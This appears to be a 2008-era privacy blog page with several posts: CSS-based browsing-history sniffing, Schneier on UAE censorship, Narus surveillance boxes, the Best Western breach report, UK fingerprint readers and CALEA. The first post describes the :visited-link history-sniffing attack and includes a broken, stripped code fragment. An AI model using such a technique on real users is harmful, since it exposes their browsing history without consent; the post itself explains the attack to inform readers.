Skip to content

There Is No Privacy #1: Snooping Browsing History through HTML

Unless you have installed a couple of specific firefox extensions to protect yourself, the owners of any website you visit can tell whether you have visited any other website.

It has been known since 2006 that is it possible for any website to query whether you have visited any of a list of other websites without even having to use javascript. One way to do this is to rely on the fact that CSS (that language for HTML style sheets used by virtually every website) allows website hosts to specific a different color or background image for a given link depending on whether that link has been visited before. By specifying a url on the snooping host as the background of a visiting link, a snooping website can determine whether you have visited any given link, as demonstrated by this code snippet from the above page:

    <style type="text/css">
         background: url;

    <a id="foo" href=""></a>

To watch this attack in action, click on the ‘View all sites of interest’ link on the right hand side of this page by Markus Jakobsson, Tom N. Jagatic, and Sid Stamm at the University of Indiana. The authors of the page specifically suggest that this sort of attack could be used by phishers to figure out which bank to emulate to fool a user into logging into a fake bank page, but there are any number of different ways to use this information. Felten and Schneider have written about a similar attack using cache timing that similarly gives access to a user’s browsing history.

Neither the link background and caching timing attacks rely on javascript, the source of a large number of privacy attacks. This freedom from javascript makes the attacks particularly effective, since one common (though highly invconcenient) method of securing a browser is to turn off javascript support. Even those who choose to turn off javascript are not safe from these attacks. There are firefox extensions to protect against both attacks, but they are not widely used. The developers of the core firefox browser have chosen not to include the code in those extensions in the base browser even though the attack has been well known among security geeks for a couple of years, with the result that the vast majority of users remain vulnerable to the attack. The end result is that, unless you use firefox and install the above extensions or periodically purge your browser history, any website you visit can tell whether you have visited any other website.

Update: The above extensions evidently don’t even work with firefox 3.0, though firefox 3.1 is reported to have a non-ui-accessible configuration setting that will block the visited link color by turning off the visited link feature altogether.

Tagged ,

Schneier (wrong) on censorship

Security guru (and potential CISO for the Obama Administration) Bruce Schneier recently blogged about his thoughts on the Internet censorship methods used in the United Arab Emirates:

The government of the United Arab Emirates (UAE) pervasively filters Web sites that contain pornography or relate to alcohol and drug use, gay and lesbian issues, or online dating or gambling. Web-based applications and religious and political sites are also filtered, though less extensively. Additionally, legal controls limit free expression and behavior, restricting political discourse and dissent online.

What was interesting to me about how reasonable the execution of the policy was. Unlike some countries — China for example — that simply block objectionable content, the UAE displays a screen indicating that the URL has been blocked and offers information about its appeals process.

Have things gotten so bad that transparent censorship is something to be praised?

At the end of the day, is being forwarded to a page hosted by the Ministry of Information that much better than being silently redirected to an unoffensive website, a tactic the Chinese have adopted in their recent blocking of BitTorrent websites?

From the perspective of the end user, the information they want to receive is still beyond reach — and who in her right mind is going to risk drawing attention to herself by filing an appeal to request a manual review of the blocking information on the Falun Gong, homosexuality or another banned topic?

Internet censorship should not be praised — and to see Schneier, a top executive at a major International telecommunications company saying anything positive about the subject is alarming.

Schneier might be correct on most things security, but on this issue, he’s frighteningly wrong.

Narus: Security through Surveillance

In 2006, an AT&T engineer named Mark Klein revealed a secret room inside a major Internet hub that was only accessible to engineers with NSA security clearance. His revelation was written up in the New York Times as part of its larger coverage of NSA wiretapping of domestic communications. Among the documents revealed by Klein was an equipment list for the secret room. Among a dozen high powered servers and networking devices on the list was a single device by a company called Narus.

Narus describes itself as “the leader in real-time traffic intelligence for the protection and management of large IP networks.” In practice, Narus produces network monitoring software for two purposes: protection and management of the traffic itself and “semantic analysis” of the traffic. The first product sits in the middle of large network carriers (like AT&T) and provides analysis of traffic to detect cyber-security threats like worms, denial of service attacks, and network hijackings. Here’s a diagram from a Narus demo showing its network management product:

The second “semantic analysis” product is marketed to governments for use in law enforcement:

* Intercept and surveillance application for real-time precision targeting of any type of IP traffic
* Provides real-time, surgically precise targeting, allowing full IP session reconstruction and visibility for targeted traffic such as webmail, e-mail, IM, chat, Voip and other IP-based communications
* Enables the capture of packet-level, flow-level and application-level usage information for forensic analysis, surveillance and regulatory compliance
* Secures network monitoring with the complete capture of only targeted data
* Insight into, and monitoring of, the entire network regardless of size, speed or the routing topology of the network

In other words, Narus sells the “mass intercept” black boxes that sit in phone company closets surveilling customer traffic for the NSA and other intelligence / law enforcement agencies. The Narus box listed in the document revealed by Klein was one of the Narus products designed for this use.

Both of the Narus products are built on the same underlying platform, because the task of surveilling a network to manage it and surveilling a network to process user traffic is largely the same. Indeed, the two blend into one another, as promoted by Narus:

The same product that can block worms and DDoS attacks can also block “rogue VoIP” connections in Pakistan, “mediate” dangerous websites in Saudi Arabia, and “tier” service for preferred content providers. And a slightly differently focused version of that same product can collect, sort, and archive user content, including web, email, chat, and even webmail for targeted or mass surveillance. Once a box with these sorts of specific surveillance capabilities is sitting in the middle of the network, it potentially has access to all of the data flowing over that network. It’s a natural marriage for the company who makes the boxes to extend into both the network management and the government surveillance markets, and in the spaces between.

The common theme through these uses is security through surveillance. Narus’ network management features provide security from botnets, worms, and other such cyber threats by surveilling massive amounts of traffic for “actionable intelligence” on the state of the network. Narus’ mass intercept features provide security from terrorists and dissidents by surveilling massive amounts of traffic for “actionable intelligence” on the communications of users within the network. Many scholars argue that that judging surveillance as a tradeoff between security and liberty make no sense: massive use of CCTV cameras in the U.K. has not been shown to decrease crime and domestic surveillance of domestic phone calls in the U.S. by the NSA has led to lots of investigations of pizza places. But the utility of Narus and other such systems seems both straightforward and necessary in the age of 40Gbs DDoS attacks.

The danger of this confluence of functions is that Narus boxes are given complete access to “over 30% of the world’s Internet traffic and meeting the most stringest requirements of the world’s largest networks such as at&t, KT, KDDI, Telecom Egypt, KPN and US Cellular.” The use of the boxes both places trust in the systems that Narus is building but also makes their more intrusive uses simply a matter of flipping a switch.

Tagged , ,

Best Western Data Breach as Shell Game

On August 26, 2008, the Sunday Herald reported that a hacker had broken into the Best Western reservations system and stolen personal and financial data about eight million Best Western customers, including credit card numbers. According to the report, the thief had installed a virus on the machine of an employee of a local hotel and used that virus to log the employee’s username and password for the hotel system. With that login information, the thief had simply and quickly mined the hotel reservation system for all the information about all of Best Western’s customers. The original report quoted a security expert in exclaiming that “there’s enough data there to spark a major European crime wave.” Accustomed to a string of announcements about large scale data breaches, news media and blogs across the Internet amplified the report.

Almost immediately the CIO of Best Western posted a comment on the Sunday Herald story’s web page asserting that “This story is grossly unsubstantiated! … This has affected only ten customers who we are currently being contacted to offer our assistance, none of these were GB customers.” Within a couple of days, Information Week posted an interview with the CIO of Best Western, in which he argued that individual hotel clerks have access only to accounts for their local hotels, that credit card information is deleted from the system within seven days of use, and that the reporter of the original story had basically made up the eight million number out of whole cloth. Neither the Sunday Herald nor the original reporter have amended the story or commented on the claims that they exaggerated the problem. The reporter claimed to have screenshots that showed the entire database of eight million accounts but has not posted those screenshots or further evidence of a large scale data breach.

Notwithstanding the well established habit for companies to attempt to minimize the importance of their data breaches, the bulk of the evidence suggests that the Best Western side of the story is much more likely to be the closest to the truth. Hacker or not hacker, it would be egregious to allow a single hotel clerk from a local hotel access to the credit card details of every single Best Western customer. Likewise, it would be horrible security practice not to monitor access to sensitive customer information by authorized users (as the CIO claims that his systems were doing). With thousands of such local clerks, it would be inevitable that some of them would fall to the temptation of stealing account information without need for any sophisticated software. This is not to say that such a data breach is not possible or that more egregious data breaches have not happened. But without more evidence, it seems very likely that the original reporter got carried away and assumed a much greater breach than actually happened.

What’s interesting about the case is the difficulty of telling exactly what happened and what that difficulty says about the state of security and privacy online. Despite claims of a massive crime wave, the system of social insurance set up around credit cards is able to handle large scale breaches of account information without widely visible effects on customers. For example, the 2007 T. J. Maxx data breach exposed more than 45 million credit card numbers. The FBI reported millions of dollars in theft from Walmart, but that level of theft is line noise within the total credit cards sales for Walmart, let alone for all credit card transactions.

The card companies are able to detect fraudulent card uses in many or most cases and either refuse them or charge them back to the merchants (resulting in higher prices by the merchants). Thieves are more likely to charge small amounts to large numbers of cards than large amounts to individuals cards to avoid notice, further mitigating the amount of damage done. Fraudulent charges that are noticed by customers are eaten by the card companies (and passed on in large to customers as credit card charges), and those that are not are simply eaten by the customers. But again the charges that are most likely not to noticed are small ones. The card companies don’t want customers to feel that their cards are not secure, so they do not widely publish this information to customers, but the industry is structured simply to eat some small percentage of fraudulent charges simply as the price of using credit cards widely.

Because of large scale data breaches and the general insecurity of our current computing / Internet infrastructure, credit card numbers at this point are basically an advisory security feature. They are just secret enough to let other folks know that it is wrong to use them, but not secret enough to stop a bad guy from getting access to them. The credit card companies have a strong vested interest, however, in the idea that credit cards are strongly secure, because customers will stop using them if they feel they can’t be trusted. So they encourage the idea that credit cards are secure, while implementing strong mechanisms on the back end (such as increasingly aggressive fraud detection algorithms) to deal with the fact that they are not.

Massive breaches of credit card like the T. J. Maxx case and the alleged Best Western case highlight the nature of this shell game, though. The system can absorb the loss of tens of millions of card numbers with little or not impact to end customers en masse. But because the credit cards have this interest in hiding what’s actually happening, it’s very difficult to decode these cases. They fade into the background in one way or another — either because the there was no data breach or because the system of social insurance created by the credit card companies absorbs the costs with little real impact on end customers. The only thing we can tell from the cases is the shell game nature of credit card numbers (and online privacy in general, but that’s an argument for further posts!).

Tagged , ,

Handheld fingerprint readers and the British surveillance state

Hundreds of years ago, with the passage of the Magna Carta, Great Britain took a bold step in outlining basic civil liberties for the common man. Unfortunately, over the past few years, the UK has switched from being a basic rights trend-setter, to a surveillance innovator. What ever happened?

Last year, a troubling new law came into effect which makes it a criminal offense to refuse to hand over one’s encryption key to law  enforcement engaged in a ‘legitimate’ investigation. This was tested out in court a couple weeks ago, and unfortunately, the right to privacy lost. As Ars Technica described:

The Court stated that although there was a right to not self-incriminate, this was not absolute, and that the “public interest” can supersede this right in some circumstances.fd

Just last week, the British government floated a proposal to require that a passport be shown in order to purchase a mobile phone or SIM card. After all, whats the point in spending all that money recording calls and real-time location information if you can’t be sure who is speaking on the other end of the line.

Finally, the latest nail in the privacy coffin has been announced: Starting in 2009, British police will be issued hand-held fingerprint readers, connected to a central server via a wireless/cellular connection. Given the existing (and troubling) powers that police have to arbitrarily stop and question people in the street due to “terrorism” concerns, this’ll allow them to immediately determine someone’s identity on the spot, with or without a national ID card.

Thankfully, it isn’t yet a crime to not have working fingerprints. Thus, it’s quite quite easy to imagine the privacy-aware crowd turning to acid, glue or other techniques to erase the ridges and swirls from their own fingertips.

Tagged , ,

CALEA Status

I recently spent a surprisingly difficult afternoon trying to figure out the current status of CALEA (Computer Assistance for Law Enforcement Act), the 1994 law that requires telecommunications companies to build tools into their telephone networks that allow them to respond quickly and fully to law enforcement requests for wiretaps. CALEA is a hugely important surveillance law that few people outside of the surveillance / networking field know about at all. And even for those of who spend our days studying surveillance, it’s difficult just to figure out what it means — not in larger sense, just what it actually requires in plain language. Relying largely on this excellent post by Susan Crawford, here’s my understanding:

The impetus for CALEA in 1994 was the growing use of a new generation of digital telephone switches that did not inherently provide the same support for wiretapping as did the older tools. In 2005, the FCC extended its interpretation of the law to require that ISPs provide wiretapping access to a range of Internet data. The accessible data includes voice over IP (VoIP) Internet telephony services like Vonage and Skype, data about when and for how long Internet broadband subscribers connect to the Internet, and packet header data (the source and destination addresses and the port number) of all VoIP packets. In order to reduce the very large cost of implementing this new interpretation of CALEA, the FCC has ruled that ISPs could forward their entire data stream to an independent “Trusted Third Party” to handle the wiretapping implementation, with the effect of exposing the entire data stream of an ISP using this option to a third party.

The Department of Justice submitted a petition in 2007, yet to be ruled on, to include the packet header data of all Internet data, not just VoIP data, but web, email, instant message, and all other Internet traffic.⁠ CALEA does not provide legal justification for anyone to actually access the provided data; it only mandates that the ISP build the technical capability to respond to such requests, whose legality is determined by other laws. And the laws that regulate wiretapping require law enforcement agencies wiretap only specific individuals and only with a warrant.

Between 2005 when the new requirements for ISPs were enacted and the 2007 deadline for compliance, there was a great deal of controversy over whether CALEA would cover universities (and libraries, schools, and other such organizations) that function as ISPs for their communities. According to This Ars Technica article, this EduCause policy letter, and my own private conversations indicate that universities chose not to comply with the CALEA requirements for ISPs, and that the FCC chose not to require compliance, though there is still a great deal of ambiguity about the meaning of CALEA for universities.

There is no oversight of the Trusted Third Parties that are now widely used by ISPs to comply with CALEA. For an ISP that uses a Trusted Third Party, every bit of data of every one of its customers flows through that external company. This arrangement invests a huge amount of trust in companies that customers don’t even know about, let alone have any reason to trust.

The legally mandated 2007 annual wiretap report reported 2,208 authorized wiretaps in the country, resulting in about 5,000 arrests. From those 5,000 arrests, abut 1,000 convictions were obtained. The 2005 updated ruling that required ISPs to comply with the law required that the ISPs pay for the necessary changes themselves. Because the costs are born by the individual ISPs, there are no concrete numbers for the total cost of compliance. Estimates have ranged from 1 to 5 cents per subscriber per month ($7 million – $35 million per year) to $7 billion dollars for university compliance. Significant extra costs are required on the client side for law enforcement agencies to receives the data, including up to $30,000 per year for equipment to receive the data and up to $20,000 per month for the T-1 lines required by some providers to receive the data.

Tagged , , , ,